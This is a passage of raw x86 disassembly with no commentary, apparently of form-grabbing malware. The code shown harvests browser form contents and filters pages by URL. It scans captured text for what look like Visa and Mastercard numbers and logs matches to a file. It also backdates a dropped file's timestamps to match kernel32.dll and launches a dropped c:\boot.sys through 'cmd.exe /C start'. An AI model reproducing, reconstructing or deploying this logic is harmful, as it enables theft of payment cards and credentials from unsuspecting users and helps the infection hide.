ebx jz short loc_40460A mov eax, [ebp-52608h] push eax mov esi, [eax] call dword ptr [esi+8] mov eax, [ebp-52604h] push eax mov esi, [eax] call dword ptr [esi+8] jmp loc_404B0E ; --------------------------------------------------------------------------- loc_40460A: ; CODE XREF: sub_4043B0+197j ; sub_40457C+6Fj lea eax, [ebp-525ECh] push eax mov eax, [ebp-525E4h] push eax mov edi, [eax] call dword ptr [edi+24h] mov ebx, eax or ebx, ebx jnz loc_404E4B and dword ptr [ebp-21784h], 0 jmp loc_404AFC sub_40457C endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_404878 loc_404633: ; CODE XREF: sub_404878+290j push 0 call sub_407DC8 pop ecx mov word ptr [ebp-62658h], 2 mov eax, [ebp-21784h] mov [ebp-62650h], eax lea eax, [ebp-62644h] push eax lea esi, [ebp-62658h] sub esp, 10h mov edi, esp mov ecx, 4 rep movsd lea esi, [ebp-62658h] sub esp, 10h mov edi, esp mov ecx, 4 rep movsd mov edi, [ebp-525E4h] push edi mov edi, [edi] call dword ptr [edi+2Ch] mov ebx, eax or ebx, ebx jnz loc_404AF6 and dword ptr [ebp-6265Ch], 0 lea eax, [ebp-6265Ch] push eax push offset dword_4253A8 mov eax, [ebp-62644h] push eax mov edi, [eax] call dword ptr ds:0[edi] mov ebx, eax or ebx, ebx jnz loc_4048E4 lea eax, [ebp-62660h] push eax mov eax, [ebp-6265Ch] push eax mov edi, [eax] call dword ptr [edi+0F0h] mov ebx, eax or ebx, ebx jnz loc_4048E4 lea eax, [ebp-62627h] push eax push dword ptr [ebp-62660h] call sub_404117 add esp, 8 mov edi, eax inc edi mov [ebp-6263Ch], edi and dword ptr [ebp-52624h], 0 jmp short loc_40472E ; --------------------------------------------------------------------------- loc_404705: ; CODE XREF: sub_404878-13Ej mov eax, [ebp-52624h] mov al, [ebp+eax-62627h] cmp al, 0Dh jz short loc_40471A cmp al, 0Ah jnz short loc_404728 loc_40471A: ; CODE XREF: sub_404878-164j mov eax, [ebp-52624h] mov byte ptr [ebp+eax-62627h], 0 loc_404728: ; CODE XREF: sub_404878-160j inc dword ptr [ebp-52624h] loc_40472E: ; CODE XREF: sub_404878-175j mov eax, [ebp-6263Ch] cmp [ebp-52624h], eax jb short loc_404705 cmp dword ptr [ebp-524CCh], 0FFFFFFFFh jnz short loc_404774 push dword ptr [ebp-21784h] push offset aMainpgForm_X ; "<MAINPG-FORM_%X> " lea eax, [ebp-6275Fh] push eax call sub_407E40 lea eax, [ebp-6275Fh] push eax lea eax, [ebp-10001h] push eax call sub_407E64 add esp, 14h jmp short loc_4047A7 ; --------------------------------------------------------------------------- loc_404774: ; CODE XREF: sub_404878-135j push dword ptr [ebp-21784h] push dword ptr [ebp-524CCh] push offset aFrame_XForm_X ; "<FRAME_%X-FORM_%X> " lea eax, [ebp-6275Fh] push eax call sub_407E40 lea eax, [ebp-6275Fh] push eax lea eax, [ebp-10001h] ; END OF FUNCTION CHUNK FOR sub_404878 ; =============== S U B R O U T I N E ======================================= sub_40479E proc near ; DATA XREF: sub_41D569+502o push eax call sub_407E64 add esp, 18h loc_4047A7: ; CODE XREF: sub_404878-106j and dword ptr [ebp-52624h], 0 loc_4047AE: ; CODE XREF: sub_40479E+9Bj mov eax, [ebp-52624h] lea ecx, [ebp+eax-62627h] or eax, 0FFFFFFFFh loc_4047BE: ; CODE XREF: sub_40479E+25j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_4047BE mov [ebp-62630h], eax cmp eax, 0 jz short loc_4047D7 cmp eax, 0C8h jbe short loc_4047D9 loc_4047D7: ; CODE XREF: sub_40479E+30j jmp short loc_404820 ; --------------------------------------------------------------------------- loc_4047D9: ; CODE XREF: sub_40479E+37j cmp dword ptr [ebp-62630h], 1 jnz short loc_4047F2 mov eax, [ebp-52624h] cmp byte ptr [ebp+eax-62627h], 20h jz short loc_404820 loc_4047F2: ; CODE XREF: sub_40479E+42j push offset asc_4247C0 ; "|" lea eax, [ebp-10001h] push eax call sub_407E64 mov eax, [ebp-52624h] lea eax, [ebp+eax-62627h] push eax lea eax, [ebp-10001h] push eax call sub_407E64 add esp, 10h loc_404820: ; CODE XREF: sub_40479E:loc_4047D7j ; sub_40479E+52j mov eax, [ebp-62630h] inc eax add [ebp-52624h], eax mov eax, [ebp-6263Ch] cmp [ebp-52624h], eax jb loc_4047AE and dword ptr [ebp-62638h], 0 lea ecx, [ebp-10001h] or eax, 0FFFFFFFFh loc_40484F: ; CODE XREF: sub_40479E+B6j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_40484F mov [ebp-62630h], eax mov dword ptr [ebp-52624h], 0 jmp short loc_4048C8 sub_40479E endp ; sp-analysis failed ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_404878 loc_404868: ; CODE XREF: sub_404878+5Cj mov eax, [ebp-52624h] cmp byte ptr [ebp+eax-10001h], 20h jz short loc_40487F ; END OF FUNCTION CHUNK FOR sub_404878 ; =============== S U B R O U T I N E ======================================= sub_404878 proc near ; DATA XREF: sub_41D569+55Bo ; FUNCTION CHUNK AT 00404633 SIZE 0000016B BYTES ; FUNCTION CHUNK AT 00404868 SIZE 00000010 BYTES and dword ptr [ebp-6262Ch], 0 loc_40487F: ; CODE XREF: sub_404878-2j cmp dword ptr [ebp-6262Ch], 0 jnz short loc_4048A8 mov eax, [ebp-62638h] mov edx, [ebp-52624h] mov dl, [ebp+edx-10001h] mov [ebp+eax-10001h], dl inc dword ptr [ebp-62638h] loc_4048A8: ; CODE XREF: sub_404878+Ej mov eax, [ebp-52624h] cmp byte ptr [ebp+eax-10001h], 20h jnz short loc_4048C2 mov dword ptr [ebp-6262Ch], 1 loc_4048C2: ; CODE XREF: sub_404878+3Ej inc dword ptr [ebp-52624h] loc_4048C8: ; CODE XREF: sub_40479E+C8j mov eax, [ebp-62630h] cmp [ebp-52624h], eax jb short loc_404868 mov eax, [ebp-62638h] mov byte ptr [ebp+eax-10001h], 0 loc_4048E4: ; CODE XREF: sub_404878-1C0j ; sub_404878-1A0j and dword ptr [ebp-62634h], 0 lea eax, [ebp-62634h] push eax push offset dword_4253B8 mov eax, [ebp-62644h] push eax mov edi, [eax] call dword ptr ds:0[edi] mov ebx, eax or ebx, ebx jnz loc_404AE1 lea eax, [ebp-62640h] push eax mov eax, [ebp-62634h] push eax mov edi, [eax] call dword ptr [edi+6Ch] mov ebx, eax or ebx, ebx jnz loc_404ACC and dword ptr [ebp-52628h], 0 jmp loc_404AB8 ; DATA XREF: sub_41D569+41Dr ; --------------------------------------------------------------------------- loc_40493A: ; CODE XREF: sub_404878+24Cj push 0 call sub_407DC8 pop ecx mov word ptr [ebp-62778h], 2 mov eax, [ebp-52628h] mov [ebp-62770h], eax lea eax, [ebp-62768h] push eax lea esi, [ebp-62778h] sub esp, 10h mov edi, esp mov ecx, 4 rep movsd lea esi, [ebp-62778h] sub esp, 10h mov edi, esp mov ecx, 4 rep movsd mov edi, [ebp-62634h] push edi mov edi, [edi] call dword ptr [edi+74h] mov ebx, eax or ebx, ebx jnz loc_404AB2 and dword ptr [ebp-62764h], 0 lea eax, [ebp-62764h] push eax push offset dword_4253A8 mov eax, [ebp-62768h] push eax mov edi, [eax] call dword ptr ds:0[edi] mov ebx, eax or ebx, ebx jnz loc_404A94 cmp dword ptr [ebp-62764h], 0 jz loc_404A94 lea eax, [ebp-62788h] push eax push 0 push dword ptr [ebp-10FA8h] mov eax, [ebp-62764h] push eax mov edi, [eax] call dword ptr [edi+20h] mov ebx, eax or ebx, ebx ; DATA XREF: sub_41D569+2Ao jnz loc_404A94 cmp word ptr [ebp-62788h], 8 jnz loc_404A94 movzx edi, word ptr [ebp-2] mov esi, [ebp-62764h] mov [ebp+edi*4-10FA4h], esi movzx edi, word ptr [ebp-2] mov esi, [ebp-52628h] mov [ebp+edi*2-1177Ch], si lea eax, [ebp-62788h] push eax push 0 push dword ptr [ebp-10FACh] mov eax, [ebp-62764h] ; DATA XREF: sub_41DF6A+12o push eax mov edi, [eax] call dword ptr [edi+20h] mov ebx, eax or ebx, ebx jnz short loc_404A90 lea eax, [ebp-63787h] push eax push dword ptr [ebp-62780h] call sub_404117 add esp, 8 mov edi, eax inc edi mov [ebp-6378Ch], edi cmp byte ptr [ebp-63787h], 0 jz short loc_404A90 cmp edi, 64h jnb short loc_404A90 lea eax, [ebp-63787h] push eax movzx eax, word ptr [ebp-2] imul eax, 64h lea eax, [ebp+eax-39E28h] push eax call sub_4078EC loc_404A90: ; CODE XREF: sub_404878+1CFj ; sub_404878+1F6j ... inc word ptr [ebp-2] loc_404A94: ; CODE XREF: sub_404878+147j ; sub_404878+154j ... cmp dword ptr [ebp-62764h], 0 jz short $+2 cmp dword ptr [ebp-62768h], 0 jz short loc_404AB2 mov eax, [ebp-62768h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404AB2: ; CODE XREF: sub_404878+11Aj ; sub_404878+22Cj inc dword ptr [ebp-52628h] loc_404AB8: ; CODE XREF: sub_404878+BDj mov eax, [ebp-62640h] cmp [ebp-52628h], eax jb loc_40493A jmp short loc_404AF6 ; --------------------------------------------------------------------------- loc_404ACC: ; CODE XREF: sub_404878+B0j cmp dword ptr [ebp-62634h], 0 jz short loc_404AE1 mov eax, [ebp-62634h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404AE1: ; CODE XREF: sub_404878+93j ; sub_404878+25Bj cmp dword ptr [ebp-62644h], 0 jz short loc_404AF6 mov eax, [ebp-62644h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404AF6: ; CODE XREF: sub_404878-1EDj ; sub_404878+252j ... inc dword ptr [ebp-21784h] loc_404AFC: ; CODE XREF: sub_40457C+B2j mov eax, [ebp-525ECh] cmp [ebp-21784h], eax jb loc_404633 loc_404B0E: ; CODE XREF: sub_4043B0+19Dj ; sub_40457C+25j ... inc dword ptr [ebp-524CCh] mov eax, [ebp-5261Ch] cmp [ebp-524CCh], eax jl loc_404519 loc_404B26: ; CODE XREF: sub_404BA0+4Ej push 0 call sub_407DC8 pop ecx mov word ptr [ebp-21786h], 0 jmp short loc_404BB7 sub_404878 endp ; sp-analysis failed ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_404BA0 loc_404B39: ; CODE XREF: sub_404BA0+24j lea eax, [ebp-524E0h] push eax push 0 push dword ptr [ebp-10FA8h] movzx edi, word ptr [ebp-21786h] mov edi, [ebp+edi*4-10FA4h] push edi mov edi, [edi] call dword ptr [edi+20h] mov ebx, eax or ebx, ebx jnz short loc_404BB0 lea eax, [ebp-6261Fh] push eax push dword ptr [ebp-524D8h] call sub_404117 add esp, 8 mov edi, eax inc edi mov [ebp-62624h], edi cmp byte ptr [ebp-6261Fh], 0 jz short loc_404BB0 cmp dword ptr [ebp-62624h], 64h jnb short loc_404BB0 lea eax, [ebp-6261Fh] push eax movzx eax, word ptr [ebp-21786h] ; END OF FUNCTION CHUNK FOR sub_404BA0 ; =============== S U B R O U T I N E ======================================= sub_404BA0 proc near ; DATA XREF: sub_41DF6A+143o ; FUNCTION CHUNK AT 00404B39 SIZE 00000067 BYTES imul eax, 64h lea eax, [ebp+eax-524C8h] push eax call sub_4078EC loc_404BB0: ; CODE XREF: sub_404BA0-40j ; sub_404BA0-19j ... inc word ptr [ebp-21786h] loc_404BB7: ; CODE XREF: sub_404878+2BFj movzx eax, word ptr [ebp-21786h] movzx edx, word ptr [ebp-2] cmp eax, edx jl loc_404B39 lea eax, [ebp-525FAh] push eax mov eax, dword_420010 push eax mov edi, [eax] call dword ptr [edi+7Ch] mov ebx, eax or ebx, ebx jnz loc_404E9F cmp word ptr [ebp-525FAh], 0 jz loc_404B26 mov byte ptr [ebp-2177Dh], 0 push offset byte_409130 lea eax, [ebp-2177Dh] push eax call sub_4078EC mov dword ptr [ebp-525E8h], 1 mov word ptr [ebp-1177Eh], 0 jmp loc_404CC6 ; --------------------------------------------------------------------------- loc_404C24: ; CODE XREF: sub_404BA0+133j movzx eax, word ptr [ebp-1177Eh] imul eax, 64h cmp byte ptr [ebp+eax-524C8h], 0 jz loc_404CBF and dword ptr [ebp-525E8h], 0 movzx eax, word ptr [ebp-1177Eh] push eax push offset asc_4247BB ; " %X:" lea eax, [ebp-525DFh] push eax call sub_407E40 lea eax, [ebp-525DFh] push eax lea eax, [ebp-2177Dh] push eax call sub_407E64 movzx eax, word ptr [ebp-1177Eh] imul eax, 64h lea eax, [ebp+eax-39E28h] push eax lea eax, [ebp-2177Dh] push eax call sub_407E64 push offset asc_4247B9 ; ":" lea eax, [ebp-2177Dh] push eax call sub_407E64 movzx eax, word ptr [ebp-1177Eh] imul eax, 64h lea eax, [ebp+eax-524C8h] push eax lea eax, [ebp-2177Dh] push eax call sub_407E64 add esp, 2Ch loc_404CBF: ; CODE XREF: sub_404BA0+96j inc word ptr [ebp-1177Eh] loc_404CC6: ; CODE XREF: sub_404BA0+7Fj movzx eax, word ptr [ebp-1177Eh] movzx edx, word ptr [ebp-2] cmp eax, edx jl loc_404C24 cmp dword ptr [ebp-525E8h], 0 jnz loc_404E4B push offset asc_424E5F ; " " lea eax, [ebp-2177Dh] push eax call sub_407E64 lea eax, [ebp-10001h] push eax lea eax, [ebp-2177Dh] push eax call sub_407E64 add esp, 10h cmp ds:byte_409130, 68h jnz short loc_404D31 cmp ds:byte_409131, 74h jnz short loc_404D31 cmp ds:byte_409132, 74h jnz short loc_404D31 cmp ds:byte_409133, 70h jz short loc_404D36 loc_404D31: ; CODE XREF: sub_404BA0+174j ; sub_404BA0+17Dj ... jmp loc_404E05 ; --------------------------------------------------------------------------- loc_404D36: ; CODE XREF: sub_404BA0+18Fj push 1 push offset a_google_ ; ".google." push offset byte_409130 call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz short sub_404D70 push 1 push offset a_google_adware ; ".google.adware" push offset byte_409130 call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz loc_404E05 sub_404BA0 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_404D70 proc near ; CODE XREF: sub_404BA0+1AFj ; DATA XREF: .data:0041D305o mov word ptr [ebp-525EEh], 0 loc_404D79: ; CODE XREF: sub_404DE5+Fj push 1 movzx eax, word ptr [ebp-525EEh] lea eax, ds:42001Ch[eax] push eax push offset byte_409130 call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz short loc_404DAF push 1 lea eax, [ebp-2177Dh] push eax call ds:dword_408118 jmp short loc_404E05 ; --------------------------------------------------------------------------- loc_404DAF: ; CODE XREF: sub_404D70+2Cj movzx eax, word ptr [ebp-525EEh] mov [ebp-52624h], eax lea ecx, ds:42001Ch[eax] or eax, 0FFFFFFFFh loc_404DC6: ; CODE XREF: sub_404D70+5Bj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_404DC6 mov esi, [ebp-52624h] add esi, eax mov edi, esi mov [ebp-525EEh], di inc word ptr [ebp-525EEh] sub_404D70 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_404DE5 proc near ; DATA XREF: sub_41D07D:loc_41D0E2o movzx eax, word ptr [ebp-525EEh] cmp byte_42001C[eax], 0 jnz short loc_404D79 push 0 lea eax, [ebp-2177Dh] push eax call ds:dword_408118 loc_404E05: ; CODE XREF: sub_404BA0:loc_404D31j ; sub_404BA0+1CAj ... mov word ptr [ebp-21788h], 0 jmp short loc_404E3C ; --------------------------------------------------------------------------- loc_404E10: ; CODE XREF: sub_404DE5+64j movzx edi, word ptr [ebp-21788h] cmp dword ptr [ebp+edi*4-10FA4h], 0 jz short loc_404E35 movzx edi, word ptr [ebp-21788h] mov edi, [ebp+edi*4-10FA4h] push edi mov edi, [edi] call dword ptr [edi+8] loc_404E35: ; CODE XREF: sub_404DE5+3Aj inc word ptr [ebp-21788h] loc_404E3C: ; CODE XREF: sub_404DE5+29j movzx eax, word ptr [ebp-21788h] movzx edx, word ptr [ebp-2] cmp eax, edx jl short loc_404E10 loc_404E4B: ; CODE XREF: sub_40457C+A5j ; sub_404BA0+140j cmp dword ptr [ebp-525E4h], 0 jz short loc_404E60 mov eax, [ebp-525E4h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404E60: ; CODE XREF: sub_404DE5+6Dj cmp dword ptr [ebp-52608h], 0 jz short loc_404E75 mov eax, [ebp-52608h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404E75: ; CODE XREF: sub_404DE5+82j cmp dword ptr [ebp-52604h], 0 jz short loc_404E8A mov eax, [ebp-52604h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404E8A: ; CODE XREF: sub_4043B0+15Cj ; sub_404DE5+97j cmp dword ptr [ebp-52600h], 0 jz short loc_404E9F mov eax, [ebp-52600h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404E9F: ; CODE XREF: sub_4043B0+C4j ; sub_4043B0+107j ... cmp dword ptr [ebp-525F8h], 0 jz short loc_404EB4 mov eax, [ebp-525F8h] push eax mov esi, [eax] call dword ptr [esi+8] loc_404EB4: ; CODE XREF: sub_4043B0+A8j ; sub_404DE5+C1j cmp dword ptr [ebp-525F4h], 0 jz loc_4043F5 mov eax, [ebp-525F4h] push eax mov esi, [eax] call dword ptr [esi+8] jmp loc_4043F5 sub_404DE5 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_4043B0 loc_404ED2: ; CODE XREF: sub_4043B0+3Fj pop edi pop esi pop ebx leave retn ; END OF FUNCTION CHUNK FOR sub_4043B0 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_404ED7 proc near ; DATA XREF: sub_404F53+15o var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 push ebp mov ebp, esp push 0FFFFFFFFh push offset word_42001E push offset sub_40109A mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 0Ch push ebx push esi push edi mov [ebp+var_18], esp mov [ebp+var_4], 0 loc_404F04: ; CODE XREF: sub_404ED7+46j ; sub_404ED7+61j push 1F4h call sub_407DC8 add esp, 4 call sub_4043B0 cmp dword_420018, 0 jnz short loc_404F04 jmp short loc_404F41 ; --------------------------------------------------------------------------- mov [ebp+var_4], 0FFFFFFFFh jmp short loc_404F41 ; --------------------------------------------------------------------------- mov [ebp+var_1C], 1 mov eax, [ebp+var_1C] retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] jmp short loc_404F04 ; --------------------------------------------------------------------------- mov [ebp+var_4], 0FFFFFFFFh loc_404F41: ; CODE XREF: sub_404ED7+48j ; sub_404ED7+51j pop edi pop esi pop ebx xchg eax, ecx mov eax, [ebp+var_10] mov large fs:0, eax xchg eax, ecx leave retn 4 sub_404ED7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_404F53 proc near ; CODE XREF: sub_406344+441p arg_0 = dword ptr 8 push ebp mov ebp, esp push edi mov eax, [ebp+arg_0] mov ds:dword_408118, eax push offset dword_420018 push 0 push 0 push offset sub_404ED7 push 0 push 0 call sub_407B64 ; CreateThread mov edi, eax push edi call sub_407984 ; CloseHandle pop edi pop ebp retn sub_404F53 endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp push edi cmp dword_420010, 0 jnz short loc_404F92 xor eax, eax jmp short loc_404FCB ; --------------------------------------------------------------------------- loc_404F92: ; CODE XREF: .text:00404F8Cj mov eax, ds:dword_419134 cmp [ebp+8], eax jz short loc_404FA0 xor eax, eax jmp short loc_404FCB ; --------------------------------------------------------------------------- loc_404FA0: ; CODE XREF: .text:00404F9Aj lea ecx, byte_409130 or eax, 0FFFFFFFFh loc_404FA9: ; CODE XREF: .text:00404FAEj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_404FA9 mov edi, eax add edi, 1 push edi push offset byte_409130 push dword ptr [ebp+0Ch] call sub_407E04 add esp, 0Ch mov eax, 1 loc_404FCB: ; CODE XREF: .text:00404F90j ; .text:00404F9Ej pop edi pop ebp retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_404FCE proc near ; DATA XREF: sub_406344+43Co var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 20h push ebx push esi push edi xor ebx, ebx mov [ebp+var_4], ebx mov [ebp+var_C], ebx loc_404FDF: ; CODE XREF: sub_404FCE+10Cj ; sub_404FCE+117j ... mov eax, [ebp+arg_0] cmp byte ptr [eax+ebx], 3Ah jnz loc_4050C9 mov eax, [ebp+arg_0] cmp byte ptr [ebx+eax+11h], 20h jz short loc_405001 cmp byte ptr [ebx+eax+14h], 20h jnz loc_4050C9 loc_405001: ; CODE XREF: sub_404FCE+26j mov eax, [ebp+arg_0] mov al, [ebx+eax+1] cmp al, 34h jz short loc_405014 cmp al, 35h jnz loc_4050C9 loc_405014: ; CODE XREF: sub_404FCE+3Cj mov eax, [ebp+arg_0] cmp byte ptr [ebx+eax+11h], 20h jnz short loc_405027 mov [ebp+var_4], 10h jmp short loc_40502E ; --------------------------------------------------------------------------- loc_405027: ; CODE XREF: sub_404FCE+4Ej mov [ebp+var_4], 13h loc_40502E: ; CODE XREF: sub_404FCE+57j mov [ebp+var_5], 0 xor esi, esi jmp short loc_4050A7 ; --------------------------------------------------------------------------- loc_405036: ; CODE XREF: sub_404FCE+DCj cmp [ebp+var_4], 13h jnz short loc_405079 lea eax, [ebx+esi+1] mov edx, [ebp+arg_0] cmp byte ptr [edx+eax], 2Dh jnz short loc_405079 mov edi, 5 mov edx, esi inc edx mov [ebp+var_18], edx mov [ebp+var_10], edi mov eax, edx mov [ebp+var_14], eax mov ecx, edi xor edx, edx div ecx mov [ebp+var_1C], eax mov eax, edi mov edi, [ebp+var_1C] mul [ebp+var_1C] mov [ebp+var_20], eax mov edi, [ebp+var_18] mov edx, eax cmp edx, edi jz short loc_4050A6 loc_405079: ; CODE XREF: sub_404FCE+6Cj ; sub_404FCE+79j lea eax, [ebx+esi+1] mov edx, [ebp+arg_0] mov al, [edx+eax] cmp al, 30h jl short loc_40508B cmp al, 39h jle short loc_40508D loc_40508B: ; CODE XREF: sub_404FCE+B7j jmp short loc_4050C9 ; --------------------------------------------------------------------------- loc_40508D: ; CODE XREF: sub_404FCE+BBj movzx eax, [ebp+var_5] lea edx, [ebx+esi+1] mov ecx, [ebp+arg_0] mov dl, [ecx+edx] mov ds:byte_419260[eax], dl add [ebp+var_5], 1 loc_4050A6: ; CODE XREF: sub_404FCE+A9j inc esi loc_4050A7: ; CODE XREF: sub_404FCE+66j cmp esi, [ebp+var_4] jb short loc_405036 mov eax, [ebp+var_4] mov ds:byte_419260[eax], 0 call sub_40129C or eax, eax jnz short loc_4050C9 mov [ebp+var_C], 1 jmp short loc_40511B ; --------------------------------------------------------------------------- loc_4050C9: ; CODE XREF: sub_404FCE+18j ; sub_404FCE+2Dj ... inc ebx mov eax, [ebp+arg_0] cmp byte ptr [eax+ebx], 0 jz short loc_405117 mov eax, [ebp+arg_0] cmp byte ptr [eax+ebx], 3Ch jnz loc_404FDF cmp byte ptr [ebx+eax+1], 46h jnz loc_404FDF cmp byte ptr [ebx+eax+2], 4Fh jnz loc_404FDF cmp byte ptr [ebx+eax+3], 52h jnz loc_404FDF cmp byte ptr [ebx+eax+4], 4Dh jnz loc_404FDF cmp byte ptr [ebx+eax+5], 5Fh jnz loc_404FDF loc_405117: ; CODE XREF: sub_404FCE+103j and [ebp+var_C], 0 loc_40511B: ; CODE XREF: sub_404FCE+F9j cmp [ebp+var_C], 0 jz short loc_40512D mov eax, ds:dword_419134 mov dword_41A1F4, eax jmp short loc_405195 ; --------------------------------------------------------------------------- loc_40512D: ; CODE XREF: sub_404FCE+151j push 0 push 0 push 4 push 0 push 0 push 40000000h push offset dword_408010 call sub_407A8C ; CreateFileA mov [ebp+var_10], eax push 2 push 0 push 0 push eax call sub_407ABC ; SetFilePointer mov eax, [ebp+arg_0] mov ecx, eax or eax, 0FFFFFFFFh loc_40515D: ; CODE XREF: sub_404FCE+194j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_40515D mov edi, eax push 0 lea edx, [ebp+var_14] push edx push edi push [ebp+arg_0] push [ebp+var_10] call sub_407B40 ; WriteFile push 0 lea eax, [ebp+var_14] push eax push 2 push offset asc_424CEC ; "\r\n" push [ebp+var_10] call sub_407B40 ; WriteFile push [ebp+var_10] call sub_407984 ; CloseHandle loc_405195: ; CODE XREF: sub_404FCE+15Dj pop edi pop esi pop ebx leave retn sub_404FCE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40519A proc near ; CODE XREF: sub_40523F+66p var_222 = byte ptr -222h var_21A = byte ptr -21Ah var_212 = byte ptr -212h var_20A = byte ptr -20Ah var_105 = byte ptr -105h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 224h push edi push 104h lea eax, [ebp+var_20A] push eax call sub_40799C ; GetSystemDirectoryA lea eax, [ebp+var_20A] push eax lea eax, [ebp+var_105] push eax call sub_4078EC push offset aKernel32_dll_0 ; "\\kernel32.dll" lea eax, [ebp+var_105] push eax call sub_407E64 add esp, 8 push 0 push 0 push 3 push 0 push 0 push 80000001h lea eax, [ebp+var_105] push eax call sub_407A8C ; CreateFileA mov edi, eax cmp edi, 0FFFFFFFFh jz short loc_40523C lea eax, [ebp+var_222] push eax lea eax, [ebp+var_21A] push eax lea eax, [ebp+var_212] push eax push edi call sub_407960 ; GetFileTime lea eax, [ebp+var_222] push eax lea eax, [ebp+var_21A] push eax lea eax, [ebp+var_212] push eax push [ebp+arg_0] call sub_407AC8 ; SetFileTime push edi call sub_407984 ; CloseHandle loc_40523C: ; CODE XREF: sub_40519A+62j pop edi leave retn sub_40519A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40523F proc near ; CODE XREF: sub_406344+58p var_218 = byte ptr -218h var_214 = byte ptr -214h var_110 = byte ptr -110h var_104 = byte ptr -104h push ebp mov ebp, esp sub esp, 218h push ebx push esi push edi call sub_4079C0 ; DATA XREF: sub_41E375r loc_405250: ; DATA XREF: sub_41E381r sub_41E38Dr cmp eax, 80000000h jnb loc_405307 ; DATA XREF: sub_41E399r lea edi, [ebp+var_110] ; DATA XREF: sub_41E3A5r ; sub_41E3B1r lea esi, aCBoot_sys ; DATA XREF: sub_41E3BDr ; "c:\\boot.sys" mov ecx, 3 ; DATA XREF: sub_41E3C9r loc_40526C: ; DATA XREF: sub_41E3D5r rep movsd push 0 loc_405270: ; DATA XREF: sub_41E3E1r push 0 push 2 loc_405274: ; DATA XREF: sub_41E3EDr push 0 push 0 loc_405278: ; DATA XREF: sub_41E3F9r sub_41E405r push 40000000h lea eax, [ebp+var_110] ; DATA XREF: sub_41E411r push eax loc_405284: ; DATA XREF: sub_41E41Dr call sub_407A8C ; CreateFileA mov ebx, eax push 0 lea eax, [ebp+var_218] ; DATA XREF: sub_41E429r push eax push 4001h push offset word_42002A ; DATA XREF: sub_41E435r push ebx call sub_407B40 ; WriteFile push ebx call sub_40519A ; DATA XREF: sub_41E4F1r push ebx call sub_407984 ; DATA XREF: sub_41E4FDr loc_4052B0: ; DATA XREF: sub_41E509r sub_41E515r push 104h lea eax, [ebp+var_104] ; DATA XREF: sub_41E521r push eax loc_4052BC: ; DATA XREF: sub_41E52Dr sub_41E539r call sub_40799C ; GetSystemDirectoryA lea eax, [ebp+var_104] ; DATA XREF: sub_41E545r push eax loc_4052C8: ; DATA XREF: sub_41E551r sub_41E55Dr push offset aSCmd_pif ; "%s\\cmd.pif" lea eax, [ebp+var_214] ; DATA XREF: sub_41E569r push eax loc_4052D4: ; DATA XREF: sub_41E575r sub_41E581r call sub_407E40 push offset aCmd_exeCStartC ; DATA XREF: sub_41E58Dr ; "\\cmd.exe /C start c:\\boot.sys" lea eax, [ebp+var_104] ; DATA XREF: sub_41E599r loc_4052E4: ; DATA XREF: sub_41E5A5r push eax call sub_407E64 ; DATA XREF: sub_41E5B1r add esp, 18h ; DATA XREF: sub_41E5BDr lea eax, [ebp+var_214] ; DATA XREF: sub_41E5C9r push eax loc_4052F4: ; DATA XREF: sub_41E5D5r sub_41E5E1r call sub_407B70 ; DeleteFileA push 0 lea eax, [ebp+var_104] push eax call sub_407B34 ; DATA XREF: sub_41E5EDr loc_405307: ; CODE XREF: sub_40523F+16j pop edi loc_405308: ; DATA XREF: sub_41E5F9r pop esi pop ebx leave retn sub_40523F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40530C proc near ; CODE XREF: sub_405350:loc_405370p ; DATA XREF: sub_41E605r arg_0 = dword ptr 8 push ebp mov ebp, esp push 4 ; DATA XREF: sub_41E611r push 1000h ; DATA XREF: sub_41E61Dr push [ebp+arg_0] ; DATA XREF: sub_41E629r push 0 call sub_407AF8 ; DATA XREF: sub_41E635r loc_405320: ; DATA XREF: sub_41E641r pop ebp retn sub_40530C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_405322 proc near ; CODE XREF: sub_405350+87p arg_0 = dword ptr 8 push ebp mov ebp, esp ; DATA XREF: sub_41E64Dr push 8000h push 0 push [ebp+arg_0] call sub_407B04 ; DATA XREF: sub_41E659r loc_405334: ; DATA XREF: sub_41E665r pop ebp retn sub_405322 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_405336 proc near ; CODE XREF: sub_405350+93p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp ; DATA XREF: sub_41E671r push offset dword_424078 ; DATA XREF: sub_41E67Dr push offset dword_424038 ; DATA 